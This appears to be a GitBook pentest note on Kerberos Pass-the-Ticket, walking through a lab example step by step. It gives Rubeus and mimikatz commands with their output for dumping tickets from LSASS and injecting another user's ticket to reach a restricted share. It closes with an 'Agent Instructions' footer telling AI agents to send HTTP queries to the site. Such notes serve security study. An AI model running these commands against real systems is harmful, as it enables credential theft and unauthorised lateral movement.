# Pass-the-Ticket The Pass-the-Ticket (PtT) attack abuses Kerberos TGS to impersonate users and access network resources. A TGT is used to request TGS from the KDC and is typically bound to the logon context in which it was issued. In contrast, **a TGS is issued for a specific service and can be extracted from memory and injected into another session, allowing it to be reused for authentication**. The core premise of the attack is simple: an attacker extracts a valid TGS from LSASS memory and injects it into their current session to access the corresponding service as the impersonated user. If the ticket belongs to the current user, administrative privileges are not required. This enables lateral movement without needing to dump credentials or interact extensively with LSASS, potentially reducing detection opportunities. However, improper ticket injection can disrupt existing authentication contexts. **If a ticket is injected into an active logon session without isolating it, it may overwrite an existing Kerberos ticket**. For example, if the local machine account (`SYSTEM$`) loses its ticket, it will not automatically obtain a new one until the system is rebooted. Likewise, if a service account’s ticket is overwritten, the service may fail to authenticate until it is restarted or the machine reboots. To prevent this, operators often create a **sacrificial process** that establishes a new logon session and isolates the injected ticket. This approach minimizes operational impact but typically requires elevated privileges. Tools such as Rubeus require administrative rights because they spawn a `NetOnly` process to create a new logon session for safe ticket injection. In contrast, command and control frameworks such as Covenant and Cobalt Strike can create new logon sessions using built-in features such as `maketoken`, often without requiring local administrative privileges, as they manage process interaction through mechanisms such as named pipes. {% code overflow="wrap" %} ```powershell # Create a sacrificial process (show -> shows the created process) .\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show # Check all the tickets that can be read and extracted .\Rubeus.exe triage # Extract the target ticket .\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap # Request a new TGT Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA /ptt ``` {% endcode %} In the below example, `dave` has privileged access to the `backup` folder on `WEB04`, but the compromised user, `jen`, does not. ```powershell # Check jen's permissions > whoami corp\jen > ls \\web04\backup ls : Access to the path '\\web04\backup' is denied. ``` First, we want to extract all tickets from LSASS. `mimikatz` will dump them all to `.kirbi` files. ```powershell # Dump tickets from LSASS privilege::debug sekurlsa::tickets /export ... Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi ``` We can inspect the dumped ticket files and confirm that a TGS for `dave` accessing `web04` exists. {% code overflow="wrap" %} ```powershell > dir *.kirbi Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/14/2022 6:24 AM 1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi ... ``` {% endcode %} We can then inject `dave`'s `WEB04` TGS into `jen`'s session in order to access the `backup` folder. ```powershell # Inject dave's TGS into jen's session mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi # List the cached tickets > klist ... Cached Tickets: (1) #0> Client: dave @ CORP.COM Server: cifs/web04 @ CORP.COM KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize Start Time: 9/14/2022 5:31:32 (local) End Time: 9/14/2022 15:31:13 (local) Renew Time: 9/21/2022 5:31:13 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: # Confirm access > ls \\web04\backup Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 9/13/2022 2:52 AM 0 backup_schemata.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tl-dr/active-directory/lateral-movement/pass-the-ticket.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.